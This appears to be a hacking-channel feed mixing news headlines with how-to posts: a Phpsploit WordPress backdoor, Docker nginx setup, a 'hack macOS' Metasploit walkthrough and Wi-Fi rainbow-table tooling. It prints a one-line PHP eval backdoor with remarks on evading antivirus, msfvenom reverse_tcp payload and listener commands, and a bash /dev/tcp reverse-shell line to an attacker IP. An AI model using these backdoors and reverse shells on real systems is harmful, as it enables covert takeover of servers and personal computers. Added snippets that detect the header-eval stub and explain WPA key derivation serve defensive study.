UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ World's first platform which collects & analyzes every new hacking method.
+ AI Practice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
→ Undercode.help
Forwarded from UNDERCODE NEWS
KT Holds 'Communication Big Data Platform Road Show', which gathered in one place for communication big data
#international
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Backdooring WordPress with Phpsploit:

PhpSploit is a remote control framework that aims to provide a stealthy, interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable of maintaining access to a compromised web server for privilege escalation purposes.

INSTALLATION & RUN:

Download: https://github.com/nil0x42/phpsploit

When running Phpsploit and generating a standard backdoor to place in WordPress or PHP-code it looks like this:

<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>

The above code can be generated by running the following command:

./phpsploit --interactive --eval "backdoor"

And if we insert this little eval code snippet into a WordPress PHP file and then upload the file to VirusTotal, the detection rate looks like this for the 58 different antivirus scanners currently online on VirusTotal:

Just one hit, and it is ClamAV detecting the backdoor as Php.Trojan.PhpSploit-7157376-0.

If we then run phpsploit again and set another PASSKEY

as example

And should be quite easy to trigger IDS alerts at the network level, since PHP code like eval and base64_decode should not be part of an HTTP header. This can of course also be changed in Phpsploit by using the command set REQ_HEADER_PAYLOAD.

from wpsec
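
The two checks the post points at, as an added example that is not part of the original post or of the wpsec write-up: flag PHP code in request header values, and flag the `eval($_SERVER['HTTP_…'])` stub in a PHP file regardless of which header name is used. The token list, host name, sample requests and the `HTTP_EXAMPLE_KEY` name are constructed assumptions.

```python
import re

# PHP constructs that have no business inside an HTTP request header value.
# (Token list is an assumption; extend it for your own environment.)
PHP_IN_HEADER = re.compile(
    r"\b(?:eval|assert|base64_decode|gzinflate|system|passthru)\s*\(", re.I)

# Shape of the server-side stub: eval() fed straight from a $_SERVER['HTTP_*']
# entry, whatever the header name happens to be.
HEADER_EVAL = re.compile(
    r"eval\s*\(\s*\$_SERVER\s*\[\s*['\"]HTTP_\w+['\"]\s*\]\s*\)", re.I)


def suspicious_headers(raw_request: str) -> list[tuple[str, str]]:
    """Return (header name, matched token) pairs for one raw HTTP request."""
    head = raw_request.replace("\r\n", "\n").split("\n\n", 1)[0]
    hits = []
    for line in head.split("\n")[1:]:            # skip the request line
        name, sep, value = line.partition(":")
        match = PHP_IN_HEADER.search(value)
        if sep and match:
            hits.append((name.strip(), match.group(0)))
    return hits


def has_header_eval(php_source: str) -> bool:
    """True if the source evaluates a request header as PHP code."""
    return HEADER_EVAL.search(php_source) is not None


# Constructed samples (not captured traffic).
BENIGN = ("GET /wp-login.php HTTP/1.1\r\nHost: blog.example\r\n"
          "User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n\r\n")
FLAGGED = ("GET /index.php HTTP/1.1\r\nHost: blog.example\r\n"
           'Phpspl01t: eval(base64_decode("Y29uc3RydWN0ZWQ="));\r\n\r\n')
STUB = "<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>"
RENAMED = "<?php @eval($_SERVER['HTTP_EXAMPLE_KEY']); ?>"
CLEAN_PHP = "<?php echo htmlspecialchars($_SERVER['HTTP_HOST']); ?>"

if __name__ == "__main__":
    for label, request in (("benign", BENIGN), ("flagged", FLAGGED)):
        print(label, suspicious_headers(request))
    for label, source in (("stub", STUB), ("renamed", RENAMED),
                          ("clean", CLEAN_PHP)):
        print(label, has_header_eval(source))
```

The file check matches on the structure of the stub rather than on the header name, so it still fires when the name differs from the one a fixed signature expects.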
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from UNDERCODE NEWS
Veraport's abused supply chain attack, how do general users respond?
#Vulnerabilities #CyberAttacks
Forwarded from UNDERCODE NEWS
Chinese electronic social security card application exceeds 300 million.
#Analytiques
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Download & run nginx

1) [root@localhost my.Shells]# docker images
REPOSITORY        TAG     IMAGE ID      CREATED      SIZE
docker.io/redis   latest  1e70071f4af4  6 weeks ago  106.7 MB

2) [root@localhost my.Shells]# docker pull nginx   # download nginx
Using default tag: latest
Trying to pull repository docker.io/library/nginx ...
latest: Pulling from docker.io/library/nginx
e7bb522d92ff: Pull complete
6edc05228666: Pull complete
cd866a17e81f: Pull complete
Digest: sha256:285b49d42c703fdf257d1e2422765c4ba9d3e37768d6ea83d7fe2043dad6e63d

3) [root@localhost my.Shells]# docker images
REPOSITORY        TAG     IMAGE ID      CREATED      SIZE
docker.io/nginx   latest  3f8a4339aadd  3 weeks ago  108.5 MB
docker.io/redis   latest  1e70071f4af4  6 weeks ago  106.7 MB

4) Run nginx

[root@localhost my.Shells]# docker run -p 8080:80 -d docker.io/nginx
c0462d5e18783e20f9515108fa62ab0f2ac808ea85370a7c82aee9407abf4672
[root@localhost my.Shells]# netstat -anp | grep 8080
tcp6 0 0 :::8080 :::* LISTEN 2529/docker-proxy-c

5) [root@localhost my.Shells]# docker ps   # nginx is already running
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
c0462d5e1878 docker.io/nginx "nginx -g 'daemon off" 4 minutes ago Up 4 minute

6) Run results

[root@localhost my.Shells]# ./openFirewallPort.sh

---openFirewallPort.sh-------

#!/bin/bash
echo "enter the port: "
read -r port
# open the given TCP port in the running firewalld configuration
firewall-cmd --add-port="${port}/tcp"

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from UNDERCODE NEWS
Thus the corona crisis became a hotbed for cyber attacks.
#CyberAttacks
Forwarded from UNDERCODE NEWS
The US Spy Agency warns of attacks by Chinese hackers on the army, security and industry.
#CyberAttacks
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑HACK MACOS WITH PAYLOAD-Metasploit:

1) Turn on your Kali and open a terminal.

2) Type in msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.26.130 LPORT=4444 > pyterpreter.py

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.26.130 LPORT=4444 > pyterpreter.py

Now the pyterpreter.py should appear in your Home folder

3) Open a new terminal and launch Metasploit by typing in msfconsole and press Enter. We need to set up a listener so when the script is running on the Mac computer it will instantly connect back to our attack machine.

msfconsole

4) In the new terminal, type in use multi/handler and press Enter

5) Now we need to set the PAYLOAD, the LHOST which is the attacker IP address and the LPORT which is the port we want to listen on. You can do that by executing the following commands consecutively.

set PAYLOAD python/meterpreter/reverse_tcp
set LHOST 192.168.26.130
set LPORT 4444

6) To start up the handler, enter this command exploit -j -z

7) Now send the pyterpreter.py file to the Mac machine and execute it.

Enter the command session -i 1 and press Enter. You should now be able to interact with the Mac machine.

bash -i >& /dev/tcp/192.168.26.130/4444 0>&1 2>&1

This command simply means "send an interactive bash session to IP address 192.168.26.130 on TCP port 4444."

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from UNDERCODE NEWS
Amazon apologizes for recent PlayStation 5 shipping issues.
#international
Forwarded from UNDERCODE NEWS
Ransomware attack caused E-Land store business disruption
#CyberAttacks
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Wi-Fi rainbow table generator
Wi-Fi rainbow tables can be generated by the wlangenpmkocl program from the hcxkeys package.

The hcxkeys package includes two utilities:

1) wlangenpmk - generates plainmasterkeys (using CPU) from essid and password for use in hashcat (with hash mode 2501) or John the Ripper (hash type wpapsk-pmk)

2) wlangenpmkocl - generates plainmasterkeys (using GPU) from essid and password for use in hashcat (with hash mode 2501) or John the Ripper (hash type wpapsk-pmk)

That is, the only difference between them is that wlangenpmkocl uses a video card, while wlangenpmk uses a central processor. It is of course preferable to use the graphics card version (i.e. wlangenpmkocl). The wlangenpmk version is only for extreme situations - you do not have a discrete video card or you cannot install its driver for full OpenCL support.

🦑How to install hcxkeys
To use wlangenpmkocl, install the drivers for the video card; information about this and about OpenCL can be found in the articles:

Installing video drivers in Linux
How to crack passwords in Linux with a video card and a central processor

Installation on Kali Linux

1) sudo apt install openssl opencl-headers git

2) git clone https://github.com/ZerBea/hcxkeys

3) cd hcxkeys/

4) make

5) sudo make install

If the following messages are displayed while executing the make command:

gcc -O3 -Wall -Wextra -std=gnu99 -DVERSION_TAG=\"6.0.0-2-gcc4549f\" -DVERSION_YEAR=\"2020\" -o wlangenpmk wlangenpmk.c -lcrypto
gcc -O3 -Wall -Wextra -std=gnu99 -DVERSION_TAG=\"6.0.0-2-gcc4549f\" -DVERSION_YEAR=\"2020\" -o wlangenpmkocl wlangenpmkocl.c -lcrypto -lOpenCL
In file included from /usr/include/CL/cl.h:20,
                 from wlangenpmkocl.c:26:
/usr/include/CL/cl_version.h:22:9: note: ‘#pragma message: cl_version.h: CL_TARGET_OPENCL_VERSION is not defined. Defaulting to 220 (OpenCL 2.2)’
   22 | #pragma message("cl_version.h: CL_TARGET_OPENCL_VERSION is not defined. Defaulting to 220 (OpenCL 2.2)")
      |         ^~~~~~~
gcc -O3 -Wall -Wextra -std=gnu99 -DVERSION_TAG=\"6.0.0-2-gcc4549f\" -DVERSION_YEAR=\"2020\" -o pwhash pwhash.c -lcrypto

then these are not errors - they are information. Compilation should still succeed and you can continue.

Installation in BlackArch

sudo pacman -S hcxkeys
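
What "plainmasterkeys from essid and password" means, as an added example that is not part of the original post or of the hcxkeys code: the WPA/WPA2-PSK master key is PBKDF2-HMAC-SHA1 over the passphrase with the ESSID as salt, so a precomputed list is only valid for the one ESSID it was built for. The function names and the sample ESSIDs are constructed for illustration.

```python
import hashlib


def wpa_pmk(passphrase: str, essid: bytes) -> bytes:
    """WPA/WPA2-PSK pairwise master key.

    PBKDF2-HMAC-SHA1, ESSID as salt, 4096 iterations, 32-byte output.
    """
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8..63 characters")
    if not 1 <= len(essid) <= 32:
        raise ValueError("ESSID must be 1..32 bytes")
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("utf-8"), essid, 4096, 32)


def pmk_per_essid(passphrase: str, essids: list[bytes]) -> dict[bytes, str]:
    """Same passphrase under several ESSIDs: each network gets its own PMK."""
    return {essid: wpa_pmk(passphrase, essid).hex() for essid in essids}


if __name__ == "__main__":
    # Constructed sample ESSIDs; they differ only in letter case.
    for essid, pmk in pmk_per_essid("password", [b"IEEE", b"ieee"]).items():
        print(essid.decode(), pmk)
```

Because the ESSID is the salt, a network with a unique ESSID is not covered by tables computed in advance for common names; the passphrase strength still decides how a targeted guess fares.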

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from UNDERCODE NEWS
Microsoft employees began moving to the new campus in Herzliya, which was established with an investment of about NIS 350 million.
#international